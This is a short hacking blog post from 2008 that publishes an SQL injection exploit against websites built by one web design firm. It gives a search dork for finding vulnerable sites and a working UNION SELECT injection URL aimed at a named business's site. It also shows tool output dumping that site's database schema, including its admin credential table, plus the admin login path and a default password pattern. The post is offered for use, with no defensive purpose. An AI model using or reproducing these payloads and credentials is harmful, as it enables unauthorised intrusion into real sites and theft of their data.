viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Saturday, November 22, 2008

[SQLi] BigKid Designs Websites

6:34 PM Posted by viperfx07 No comments
Dork = inurl:news.php?p=shw
PoC = http://www.site.com/news.php?p=shw&id=[SQLi]
Demo = http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,3,4,5,6,7,8--

Database structure:
[+] URL:http://www.warnemarketing.com.au/news.php?p=shw&id=47+AND+1=2+UNION+SELECT+0,1,2,unhex(hex(sqli)),4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 18:08:49
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: warne_warne
User: warne_warne@localhost
Version: 5.0.51a-community-log

[Database]: warne_warne
[Table: Columns]
[0]admin: adm_id,adm_email,adm_fname,adm_lname,adm_login,adm_pass
[1]articles: a_id,a_date,a_title,a_cat,a_desc,a_ftype,a_file,a_pub
[2]articles_cats: a_c_id,a_c_name
[3]articles_types: a_t_id,a_t_name,a_t_type,a_t_icon
[4]kid_casestudy: cs_id,cs_date,cs_name,cs_problem,cs_solution,cs_final,cs_logo,cs_image,cs_pub
[5]news: n_id,n_date,n_time,n_title,n_news,n_name,n_image,n_comm,n_pub
[6]news_comm: n_c_id,n_c_idnum,n_c_name,n_c_email,n_c_comm,n_c_date,n_c_time,n_c_pub
[7]pages: pg_id,pg_name,pg_title,pg_description,pg_keywords,pg_revisit,pg_content
[8]testimonials: test_id,test_date,test_name,test_cname,test_pos,test_testimony,test_pub

[-] [18:10:40]
[-] Total URL Requests 62
[-] Done


Admin page = http://www.site.com/admin/
Admin login default = bigkid:emijane[N]
Note: Replace [N] with 1 - 9

0 comments:

Post a Comment